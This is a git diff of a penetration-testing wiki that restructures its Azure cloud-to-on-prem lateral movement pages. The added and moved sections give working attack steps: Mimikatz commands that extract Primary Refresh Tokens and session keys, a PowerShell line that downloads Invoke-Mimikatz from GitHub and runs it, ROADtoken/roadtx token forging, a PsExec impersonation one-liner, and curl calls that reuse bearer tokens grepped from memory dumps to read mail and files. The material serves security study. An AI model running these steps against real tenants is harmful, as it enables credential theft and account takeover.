impr

src/SUMMARY.md

@@ -442,22 +442,19 @@
       - [Az - Azure Network](pentesting-cloud/azure-security/az-services/vms/az-azure-network.md)
   - [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md)
   - [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md)
-    - [Az AD Connect - Hybrid Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md)
-      - [Az - Hybrid Identity Misc Attacks](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-hybrid-identity-misc-attack.md)
-      - [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md)
-      - [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-federation.md)
-      - [Az - Cloud Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-sync.md)
-      - [Az - Connect Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-connect-sync.md)
-      - [Az - Domain Services](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-domain-services.md)
-      - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-pta-pass-through-authentication.md)
-      - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md)
-      - [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md)
+    - [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md)
+    - [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-kerberos-trust.md)
+    - [Az - Cloud Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-cloud-sync.md)
+    - [Az - Connect Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-connect-sync.md)
+    - [Az - Domain Services](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md)
+    - [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.md)
+    - [Az - Hybrid Identity Misc Attacks](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.md)
     - [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md)
-    - [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md)
     - [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md)
-    - [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md)
-    - [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md)
+    - [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md)
     - [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md)
+    - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md)
+    - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/seamless-sso.md)    
   - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
     - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
     - [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)

src/pentesting-cloud/azure-security/az-device-registration.md

@@ -32,7 +32,7 @@ But it **doesn't protect** against **sniffing** the physical connection between
 If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys):
 
 {{#ref}}
-az-lateral-movement-cloud-on-prem/pass-the-prt.md
+az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
 {{#endref}}
 
 ## Registering a device with SSO tokens

src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md

@@ -1,66 +1,41 @@
 # Az - Lateral Movement (Cloud - On-Prem)
 
-## Az - Lateral Movement (Cloud - On-Prem)
-
 {{#include ../../../banners/hacktricks-training.md}}
 
-### On-Prem machines connected to cloud
+## Basic Information
 
-There are different ways a machine can be connected to the cloud:
+This section covers the pivoting techniques to move from a compromised Entra ID tenant into the on-premises Active Directory (AD) or from a compromised AD to the Entra ID tenant.
 
-#### Azure AD joined
+## Pivoting Techniques
 
-<figure><img src="../../../images/image (259).png" alt=""><figcaption></figcaption></figure>
+- [**Arc Vulnerable GPO Desploy Script**](az-arc-vulnerable-gpo-deploy-script.md): If an attacker can control or create an AD computer account and access the Azure Arc GPO deployment share, they can decrypt the stored Service Principal secret and use it to authenticate to Azure as the associated service principal, fully compromising the linked Azure environment.
 
-#### Workplace joined
+- [**Cloud Kerberos Trust**](az-cloud-kerberos-trust.md): How to pivot from Entra ID to AD when Cloud Kerberos Trust is configured. A Global Admin in Entra ID (Azure AD) can abuse Cloud Kerberos Trust and the sync API to impersonate high-privilege AD accounts, obtain their Kerberos tickets or NTLM hashes, and fully compromise on-prem Active Directory—even if those accounts were never cloud-synced—effectively bridging cloud-to-AD privilege escalation.
 
-<figure><img src="../../../images/image (222).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large">https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large</a></p></figcaption></figure>
+- [**Cloud Sync**](az-cloud-sync.md): How to abuse Cloud Sync to move from the cloud to on-premises AD and the other way around.
 
-#### Hybrid joined
+- [**Connect Sync**](az-connect-sync.md): How to abuse Connect Sync to move from the cloud to on-premises AD and the other way around.
 
-<figure><img src="../../../images/image (178).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large">https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large</a></p></figcaption></figure>
+- [**Domain Services**](az-domain-services.md): What is the Azure Domain Services Service and how to pivot from Entra ID to the AD it generates.
 
-#### Workplace joined on AADJ or Hybrid
+- [**Federation**](az-federation.md): How to abuse Federation to move from the cloud to on-premises AD and the other way around.
 
-<figure><img src="../../../images/image (252).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large">https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large</a></p></figcaption></figure>
+- [**Hybrid Misc Attacks**](az-hybrid-identity-misc-attacks.md): Miscellaneous attacks that can be used to pivot from the cloud to on-premises AD and the other way around.
 
-### Tokens and limitations <a href="#tokens-and-limitations" id="tokens-and-limitations"></a>
+- [**Local Cloud Credentials**](az-local-cloud-credentials.md): Where to find credentials to the cloud when a PC is compromised.
 
-In Azure AD, there are different types of tokens with specific limitations:
+- [**Pass the Certificate**](az-pass-the-certificate.md): Generate a cert based on the PRT to login from one machine to another.
 
-- **Access tokens**: Used to access APIs and resources like the Microsoft Graph. They are tied to a specific client and resource.
-- **Refresh tokens**: Issued to applications to obtain new access tokens. They can only be used by the application they were issued to or a group of applications.
-- **Primary Refresh Tokens (PRT)**: Used for Single Sign-On on Azure AD joined, registered, or hybrid joined devices. They can be used in browser sign-in flows and for signing in to mobile and desktop applications on the device.
-- **Windows Hello for Business keys (WHFB)**: Used for passwordless authentication. It's used to get Primary Refresh Tokens.
+- [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login.
 
-The most interesting type of token is the Primary Refresh Token (PRT).
+- [**Primary Refresh Token/Pass the PRT/Phishing PRT**](az-primary-refresh-token-prt.md): What is the PRT, how to steal it and use it to access Azure resources impersonating the user.
 
-{{#ref}}
-az-primary-refresh-token-prt.md
-{{#endref}}
+- [**PtA - Pass through Authentication**](az-pta-pass-through-authentication.md): How to abuse Pass-through Authentication to move from the cloud to on-premises AD and the other way around.
 
-### Pivoting Techniques
+- [**Seamless SSO**](az-seamless-sso.md): How to abuse Seamless SSO to move from on-prem to cloud.
 
-From the **compromised machine to the cloud**:
-
-- [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login
-- [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text.
-- [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it
-- [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it.
-- [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another
-
-From compromising **AD** to compromising the **Cloud** and from compromising the **Cloud to** compromising **AD**:
-
-- [**Azure AD Connect**](azure-ad-connect-hybrid-identity/index.html)
 - **Another way to pivot from could to On-Prem is** [**abusing Intune**](../az-services/intune.md)
 
-#### [Roadtx](https://github.com/dirkjanm/ROADtools)
-
-This tool allows to perform several actions like register a machine in Azure AD to obtain a PRT, and use PRTs (legit or stolen) to access resources in several different ways. These are not direct attacks, but it facilitates the use of PRTs to access resources in different ways. Find more info in [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/)
-
-## References
-
-- [https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
 
 {{#include ../../../banners/hacktricks-training.md}}
 

src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md

@@ -71,4 +71,3 @@ At this point, we can gather the remaining information needed to connect to Azur
 {{#include ../../../banners/hacktricks-training.md}}
 
 
-

src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md

@@ -22,19 +22,41 @@ Azure PowerShell also stores tokens and sensitive data, which can be accessed lo
 2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`.
 3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access.
 
-## Automatic Tools to find them
+### Automatic Tools to find them
 
 - [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe)
 - [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1)
 
-## Security Recommendations
+## Tokens in memory
 
-Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by:
+As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
 
-- Limiting access rights to these files.
-- Regularly monitoring and auditing these directories for unauthorized access or unexpected changes.
-- Employing encryption for sensitive files where possible.
-- Educating users about the risks and best practices for handling such sensitive information.
+Steps:
+
+1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
+2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
+3. Find the tokens that interest you the most and run tools over them:
+
+```bash
+# Check the identity of the token
+curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq
+
+# Check the email (you need a token authorized in login.microsoftonline.com)
+curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq
+
+# Download a file from Teams
+## You need a token that can access graph.microsoft.com
+## Then, find the <site_id> inside the memory and call
+curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq
+
+## Then, list one drive
+curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq
+
+## Finally, download a file from that drive:
+curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
+```
+
+**Note that these kind of access tokens can be also found inside other processes.**
 
 {{#include ../../../banners/hacktricks-training.md}}
 

src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md

@@ -12,7 +12,7 @@ In super simplified terms:
 - Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Entra ID**
 - Entra ID verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**.
 
-In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack:
+In this scenario and after grabbing all the info needed for a [**Pass the PRT**](az-primary-refresh-token-prt.md) attack:
 
 - Username
 - Tenant ID

src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md

@@ -37,4 +37,3 @@ Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSIST
 {{#include ../../../banners/hacktricks-training.md}}
 
 
-

src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md

@@ -65,15 +65,23 @@ dsregcmd /status
 # Some builds also show TpmProtected: YES/NO and KeySignTest (run elevated to test).
 ```
 
-## Dump and user unprotected PRTs
+## Pass the PRT
 
 According to [this post](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/) on Windows devices **without TPM binding**, the PRT and its session key live in LSASS (CloudAP plug‑in). With local admin/SYSTEM on that device, the PRT blob and the DPAPI‑encrypted session key can be **read from LSASS, the session key decrypted via DPAPI, and the signing key derived** to mint a valid PRT cookie (`x‑ms‑RefreshTokenCredential`). You need both the PRT and its session key—the PRT string alone isn’t enough.
 
 ### Mimikatz
 
+1. The **PRT (Primary Refresh Token) is extracted from LSASS** (Local Security Authority Subsystem Service) and stored for subsequent use.
+2. The **Session Key is extracted next**. Given that this key is initially issued and then re-encrypted by the local device, it necessitates decryption using a DPAPI masterkey. Detailed information about DPAPI (Data Protection API) can be found in these resources: [HackTricks](https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html) and for an understanding of its application, refer to [Pass-the-cookie attack](az-pass-the-cookie.md).
+3. Post decryption of the Session Key, the **derived key and context for the PRT are obtained**. These are crucial for the **creation of the PRT cookie**. Specifically, the derived key is employed for signing the JWT (JSON Web Token) that constitutes the cookie. A comprehensive explanation of this process has been provided by Dirk-jan, accessible [here](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/).
+
 ```bash
 privilege::debug
 sekurlsa::cloudap
+
+# Or in powershell
+iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
+Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'
 ```
 
 The **PRT field** contains the encrypted refresh token (typically base64 string), and KeyValue in the ProofOfPossessionKey is the DPAPI-encrypted session key (also base64).
@@ -85,6 +93,9 @@ Because DPAPI encryption for system secrets requires the machine’s system cont
 ```bash
 token::elevate
 dpapi::cloudapkd /keyvalue:<EncryptedKeyBlob> /unprotect
+
+# PowerShell version
+Invoke-Mimikatz -Command '"token::elevate" "dpapi::cloudapkd /keyvalue:<EncryptedKeyBlob> /unprotect"'
 ```
 
 The `token::elevate` will impersonate SYSTEM and the `dpapi::cloudapkd` command with `/unprotect` will use the DPAPI master key to decrypt the provided KeyValue blob. This yields the clear-text session key and also the associated Derived Key and Context used for signing:
@@ -109,8 +120,7 @@ Mimikatz will output a signed JWT (the `PRT cookie`) after the line “Signature
 
 You could also use **`roadtx`** and **`roadrecon`** with the PRT of the PRT cookie to impersonate the user *(TODO: Find the exact command lines to use roadtx/roadrecon to get credentials from a PRT)*.
 
-
-### AADInternals
+### Mimikatz + AADInternals
 
 The **`AADInternals`** PowerShell module can also be used with the previously obtained PRT and session key to generate a valid PRT token. This is useful for automating the process of obtaining a new PRT token with nonce, which can be used to fetch access tokens for Azure AD Graph API or other resources:
 ```bash
@@ -139,6 +149,32 @@ Get-AADIntAccessTokenForMSGraph -PRTToken $prtToken
 
 This obtains a fresh PRT cookie (with a nonce) and then uses it to fetch an access token for the Azure AD Graph API(demonstrating cloud access on behalf of the user). AADInternals abstracts much of the cryptography and uses Windows components or its own logic under the hood.
 
+### Mimikatz + roadtx
+
+- Renew the PRT first, which will save it in `roadtx.prt`:
+
+```bash
+roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>
+```
+
+- Now we can **request tokens** using the interactive browser with `roadtx browserprtauth`. If we use the `roadtx describe` command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim.
+
+```bash
+roadtx browserprtauth
+roadtx describe < .roadtools_auth
+```
+
+<figure><img src="../../../images/image (44).png" alt=""><figcaption></figcaption></figure>
+
+#### Mimikatz + roadrecon
+
+Having the context and the derived key dumped by mimikatz, it's possible to use roadrecon to generate a new signed cookie with:
+
+```bash
+roadrecon auth --prt-cookie <cookie> --prt-context <context> --derives-key <derived key>
+```
+
+
 ## Abusing protected PRTs
 
 Despite the mentioned protections, an attacker who has already compromised a device (as a local user or even SYSTEM) can still **abuse the PRT to obtain fresh access tokens** by leveraging Windows' own token broker APIs and security components. Instead of **extracting** the raw PRT or key, the attacker essentially **"asks" Windows to use the PRT on their behalf**. In the sections below, we outline currently valid techniques for abusing PRTs and their session keys on up-to-date Windows devices where TPM protections are in effect. All these techniques assume post-exploitation access on the target machine, and **focus on abusing built-in authentication flows** (no unpatched vulnerabilities needed).
@@ -173,12 +209,54 @@ RequestAADRefreshToken.exe --uri https://login.microsoftonline.com
 
 - **[ROADtoken](https://github.com/dirkjanm/ROADtoken)** & **[ROADtools](https://github.com/dirkjanm/ROADtools)**
 
+ROADtoken will run **`BrowserCore.exe`** from the right directory and use it to **obtain a PRT cookie**. This cookie can then be used with ROADtools to authenticate and **obtain a persistent refresh token**.
+
+To generate a valid PRT cookie the first thing you need is a nonce.\
+You can get this with:
+
 ```bash
-ROADtoken.exe --nonce <nonce-value>
-roadrecon auth --prt-cookie <cookie>
+$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
+$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"
+
+$Params = @{
+    "URI"     = $URL
+    "Method"  = "POST"
+}
+$Body = @{
+"grant_type" = "srv_challenge"
+}
+$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
+$Result.Nonce
+AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA
 ```
 
-*(Generates nonce, invokes BrowserCore to get PRT cookie, then redeems it via ROADtools)*
+Or using [**roadrecon**](https://github.com/dirkjanm/ROADtools):
+
+```bash
+roadrecon auth prt-init
+```
+
+Then you can use [**roadtoken**](https://github.com/dirkjanm/ROADtoken) to get a new PRT (run in the tool from a process of the user to attack):
+
+```bash
+.\ROADtoken.exe <nonce>
+```
+
+As oneliner:
+
+```bash
+Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}
+```
+
+Then you can use the **generated cookie** to **generate tokens** to **login** using Azure AD **Graph** or Microsoft Graph:
+
+```bash
+# Generate
+roadrecon auth --prt-cookie <prt_cookie>
+
+# Connect
+Connect-AzureAD --AadAccessToken <token> --AccountId <acc_ind>
+```
 
 
 ### **Web Account Manager (WAM) APIs**

src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md

@@ -1,39 +0,0 @@
-# Az - Processes Memory Access Token
-
-{{#include ../../../banners/hacktricks-training.md}}
-
-## **Basic Information**
-
-As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
-
-Steps:
-
-1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
-2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
-3. Find the tokens that interest you the most and run tools over them:
-
-```bash
-# Check the identity of the token
-curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq
-
-# Check the email (you need a token authorized in login.microsoftonline.com)
-curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq
-
-# Download a file from Teams
-## You need a token that can access graph.microsoft.com
-## Then, find the <site_id> inside the memory and call
-curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq
-
-## Then, list one drive
-curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq
-
-## Finally, download a file from that drive:
-curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
-```
-
-**Note that these kind of access tokens can be also found inside other processes.**
-
-{{#include ../../../banners/hacktricks-training.md}}
-
-
-

src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md

@@ -1,65 +0,0 @@
-# Az AD Connect - Hybrid Identity
-
-{{#include ../../../../banners/hacktricks-training.md}}
-
-## Basic Information
-
-Integration between **On-premises Active Directory (AD)** and **Azure AD** is facilitated by **Azure AD Connect**, offering various methods that support **Single Sign-on (SSO)**. Each method, while useful, presents potential security vulnerabilities that could be exploited to compromise cloud or on-premises environments:
-
-- **Pass-Through Authentication (PTA)**:
-  - Possible compromise of the agent on the on-prem AD, allowing validation of user passwords for Azure connections (on-prem to Cloud).
-  - Feasibility of registering a new agent to validate authentications in a new location (Cloud to on-prem).
-
-{{#ref}}
-pta-pass-through-authentication.md
-{{#endref}}
-
-- **Password Hash Sync (PHS)**:
-  - Potential extraction of clear-text passwords of privileged users from the AD, including credentials of a high-privileged, auto-generated AzureAD user.
-
-{{#ref}}
-phs-password-hash-sync.md
-{{#endref}}
-
-- **Federation**:
-  - Theft of the private key used for SAML signing, enabling impersonation of on-prem and cloud identities.
-
-{{#ref}}
-federation.md
-{{#endref}}
-
-- **Seamless SSO:**
-  - Theft of the `AZUREADSSOACC` user's password, used for signing Kerberos silver tickets, allowing impersonation of any cloud user.
-
-{{#ref}}
-seamless-sso.md
-{{#endref}}
-
-- **Cloud Kerberos Trust**:
-  - Possibility of escalating from Global Admin to on-prem Domain Admin by manipulating AzureAD user usernames and SIDs and requesting TGTs from AzureAD.
-
-{{#ref}}
-az-cloud-kerberos-trust.md
-{{#endref}}
-
-- **Default Applications**:
-  - Compromising an Application Administrator account or the on-premise Sync Account allows modification of directory settings, group memberships, user accounts, SharePoint sites, and OneDrive files.
-
-{{#ref}}
-az-default-applications.md
-{{#endref}}
-
-For each integration method, user synchronization is conducted, and an `MSOL_<installationidentifier>` account is created in the on-prem AD. Notably, both **PHS** and **PTA** methods facilitate **Seamless SSO**, enabling automatic sign-in for Azure AD computers joined to the on-prem domain.
-
-To verify the installation of **Azure AD Connect**, the following PowerShell command, utilizing the **AzureADConnectHealthSync** module (installed by default with Azure AD Connect), can be used:
-
-```bash
-Get-ADSyncConnector
-```
-
-{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
-

src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md

@@ -1,287 +0,0 @@
-# Az - Pass the PRT
-
-{{#include ../../../banners/hacktricks-training.md}}
-
-## What is a PRT
-
-{{#ref}}
-az-primary-refresh-token-prt.md
-{{#endref}}
-
-### Check if you have a PRT
-
-```
-Dsregcmd.exe /status
-```
-
-In the SSO State section, you should see the **`AzureAdPrt`** set to **YES**.
-
-<figure><img src="../../../images/image (140).png" alt=""><figcaption></figcaption></figure>
-
-In the same output you can also see if the **device is joined to Azure** (in the field `AzureAdJoined`):
-
-<figure><img src="../../../images/image (135).png" alt=""><figcaption></figcaption></figure>
-
-## PRT Cookie
-
-The PRT cookie is actually called **`x-ms-RefreshTokenCredential`** and it's a JSON Web Token (JWT). A JWT contains **3 parts**, the **header**, **payload** and **signature**, divided by a `.` and all url-safe base64 encoded. A typical PRT cookie contains the following header and body:
-
-```json
-{
-  "alg": "HS256",
-  "ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
-}
-{
-  "refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
-  "is_primary": "true",
-  "request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
-}
-```
-
-The actual **Primary Refresh Token (PRT)** is encapsulated within the **`refresh_token`**, which is encrypted by a key under the control of Azure AD, rendering its contents opaque and undecryptable to us. The field **`is_primary`** signifies the encapsulation of the primary refresh token within this token. To ensure that the cookie remains bound to the specific login session it was intended for, the `request_nonce` is transmitted from the `logon.microsoftonline.com` page.
-
-### PRT Cookie flow using TPM
-
-The **LSASS** process will send to the TPM the **KDF context**, and the TPM will used **session key** (gathered when the device was registered in AzureAD and stored in the TPM) and the previous context to **derivate** a **key,** and this **derived key** is used to **sign the PRT cookie (JWT).**
-
-The **KDF context is** a nonce from AzureAD and the PRT creating a **JWT** mixed with a **context** (random bytes).
-
-Therefore, even if the PRT cannot be extracted because it's located inside the TPM, it's possible to abuseLSASS to **request derived keys from new contexts and use the generated keys to sign Cookies**.
-
-<figure><img src="../../../images/image (31).png" alt=""><figcaption></figcaption></figure>
-
-## PRT Abuse Scenarios
-
-As a **regular user** it's possible to **request PRT usage** by asking LSASS for SSO data.\
-This can be done like **native apps** which request tokens from **Web Account Manager** (token broker). WAM pasess the request to **LSASS**, which asks for tokens using signed PRT assertion. Or it can be down with **browser based (web) flow**s where a **PRT cookie** is used as **header** to authenticate requests to Azure AS login pages.
-
-As **SYSTEM** you could **steal the PRT if not protected** by TPM or **interact with PRT keys in LSASS** using crypto APIs.
-
-## Pass-the-PRT Attack Examples
-
-### Attack - ROADtoken
-
-For more info about this way [**check this post**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/). ROADtoken will run **`BrowserCore.exe`** from the right directory and use it to **obtain a PRT cookie**. This cookie can then be used with ROADtools to authenticate and **obtain a persistent refresh token**.
-
-To generate a valid PRT cookie the first thing you need is a nonce.\
-You can get this with:
-
-```bash
-$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
-$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"
-
-$Params = @{
-    "URI"     = $URL
-    "Method"  = "POST"
-}
-$Body = @{
-"grant_type" = "srv_challenge"
-}
-$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
-$Result.Nonce
-AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA
-```
-
-Or using [**roadrecon**](https://github.com/dirkjanm/ROADtools):
-
-```bash
-roadrecon auth prt-init
-```
-
-Then you can use [**roadtoken**](https://github.com/dirkjanm/ROADtoken) to get a new PRT (run in the tool from a process of the user to attack):
-
-```bash
-.\ROADtoken.exe <nonce>
-```
-
-As oneliner:
-
-```bash
-Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}
-```
-
-Then you can use the **generated cookie** to **generate tokens** to **login** using Azure AD **Graph** or Microsoft Graph:
-
-```bash
-# Generate
-roadrecon auth --prt-cookie <prt_cookie>
-
-# Connect
-Connect-AzureAD --AadAccessToken <token> --AccountId <acc_ind>
-```
-
-### Attack - Using roadrecon
-
-### Attack - Using AADInternals and a leaked PRT
-
-`Get-AADIntUserPRTToken` **gets user’s PRT token** from the Azure AD joined or Hybrid joined computer. Uses `BrowserCore.exe` to get the PRT token.
-
-```bash
-# Get the PRToken
-$prtToken = Get-AADIntUserPRTToken
-
-# Get an access token for AAD Graph API and save to cache
-Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken
-```
-
-Or if you have the values from Mimikatz you can also use AADInternals to generate a token:
-
-```bash
-# Mimikat "PRT" value
-$MimikatzPRT="MC5BWU..."
-
-# Add padding
